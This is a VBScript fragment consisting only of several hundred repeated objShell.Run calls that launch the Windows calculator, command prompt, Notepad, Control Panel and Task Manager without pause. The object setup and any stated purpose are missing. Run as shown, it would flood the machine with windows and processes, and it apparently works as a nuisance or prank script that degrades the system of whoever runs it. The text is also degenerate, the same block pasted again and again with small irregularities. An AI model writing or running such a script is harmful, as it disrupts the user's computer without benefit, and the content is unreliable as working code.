objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
